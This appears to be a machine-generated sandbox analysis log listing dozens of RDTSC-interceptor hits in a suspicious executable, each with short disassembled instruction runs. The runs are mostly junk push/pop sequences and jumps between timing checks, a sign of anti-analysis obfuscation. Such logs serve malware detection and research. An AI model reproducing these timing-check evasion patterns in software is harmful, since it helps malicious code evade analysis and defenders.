Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D0F4 second address: D1D0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D0FC second address: D1D108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA328DF73A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D108 second address: D1D10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D395 second address: D1D3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA328DF73A6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D21F0D second address: D21F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D21F11 second address: D21F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D219BF second address: D219D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAEEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D219D5 second address: D219D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D240DD second address: D240EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA32872BAE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D240EC second address: D240F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28710 second address: D2871A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA32872BAE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2888A second address: D288A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FA328DF73A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA328DF73AFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D288A8 second address: D288B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D288B7 second address: D288BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D288BB second address: D288BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D288BF second address: D288C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28A6E second address: D28A7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28A7A second address: D28A91 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA328DF73B2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28BC5 second address: D28BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28BE1 second address: D28C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FA328DF73ABh 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007FA328DF73A6h 0x00000013 jc 00007FA328DF73A6h 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FA328DF73AFh 0x00000022 jmp 00007FA328DF73B5h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jne 00007FA328DF73A6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28C33 second address: D28C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28D83 second address: D28D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28D88 second address: D28D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30007 second address: D3000E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2E835 second address: D2E839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2E9A0 second address: D2E9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2E9A8 second address: D2E9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA32872BAF5h 0x00000009 jmp 00007FA32872BAEDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2EB4F second address: D2EB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2ECED second address: D2ECF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2ECF3 second address: D2ECF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2ECF8 second address: D2ED2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAECh 0x00000007 push edx 0x00000008 jne 00007FA32872BAE6h 0x0000000e jmp 00007FA32872BAF6h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F19D second address: D2F1A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F1A1 second address: D2F1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA32872BAE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F1B2 second address: D2F1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jmp 00007FA328DF73B0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FD41 second address: D2FD4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA32872BAE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C91A7F second address: C91A9B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA328DF73ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA328DF73ACh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C91A89 second address: C91A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA32872BAECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32939 second address: D32969 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA328DF73BCh 0x00000008 jmp 00007FA328DF73B6h 0x0000000d jnc 00007FA328DF73A8h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32969 second address: D3296D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3296D second address: D32973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32973 second address: D32979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38B8C second address: D38B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38B92 second address: D38B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38FE0 second address: D38FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA328DF73A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38FEC second address: D38FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38FF8 second address: D39001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D395CE second address: D39605 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA32872BAF2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FA32872BAF6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop esi 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39EE5 second address: D39EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FA328DF73A6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39EF5 second address: D39F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A542 second address: D3A54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A54A second address: D3A57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA32872BAE6h 0x0000000a jmp 00007FA32872BAF4h 0x0000000f popad 0x00000010 push ebx 0x00000011 jmp 00007FA32872BAEBh 0x00000016 pop ebx 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A57B second address: D3A581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A581 second address: D3A5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FA32872BAEDh 0x0000000d popad 0x0000000e jmp 00007FA32872BAF9h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A5B4 second address: D3A5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45E05 second address: D45E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45E10 second address: D45E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44F19 second address: D44F23 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA32872BAE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44F23 second address: D44F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007FA328DF73A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44F32 second address: D44F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA32872BAEAh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44F46 second address: D44F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4509C second address: D450E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FA32872BAF2h 0x00000012 pop eax 0x00000013 jc 00007FA32872BB00h 0x00000019 jmp 00007FA32872BAF4h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45216 second address: D4521A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4521A second address: D4521E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4521E second address: D45224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45224 second address: D4522A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4522A second address: D4522F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D454FC second address: D4550D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA32872BAE6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4550D second address: D4551C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007FA328DF73AEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45674 second address: D45692 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA32872BAEAh 0x00000008 jl 00007FA32872BAE6h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 ja 00007FA32872BAE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45810 second address: D45814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45ACA second address: D45AF7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA32872BAE6h 0x00000008 jmp 00007FA32872BAF3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FA32872BAECh 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45AF7 second address: D45B1C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA328DF73B6h 0x00000008 jmp 00007FA328DF73AAh 0x0000000d je 00007FA328DF73A6h 0x00000013 pushad 0x00000014 jmp 00007FA328DF73AAh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45B1C second address: D45B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45B2A second address: D45B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45B2E second address: D45B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D474E6 second address: D47505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73AAh 0x00000007 ja 00007FA328DF73A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007FA328DF73A6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47505 second address: D4750A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4750A second address: D47511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47511 second address: D47517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47517 second address: D47531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA328DF73B0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D502A4 second address: D502C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA32872BAF6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D502C5 second address: D502CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D502CB second address: D502DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FA32872BAE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D502DA second address: D502DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E848 second address: D4E84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E84C second address: D4E85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FA328DF73A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E85C second address: D4E866 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA32872BAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC62 second address: D4EC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC66 second address: D4EC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC6A second address: D4EC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA328DF73B2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC86 second address: D4EC8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F208 second address: D4F220 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA328DF73B3h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F995 second address: D4F99C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D500CE second address: D500E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA328DF73ACh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D500E0 second address: D500F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA32872BAECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D500F1 second address: D500F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D500F7 second address: D5010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA32872BAF1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5010F second address: D50113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50113 second address: D50135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA32872BAE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FA32872BAF2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4DFC8 second address: D4DFE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4DFE5 second address: D4E004 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FA32872BAE6h 0x00000010 jmp 00007FA32872BAEFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D562D1 second address: D562E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73ACh 0x00000009 rdtsc
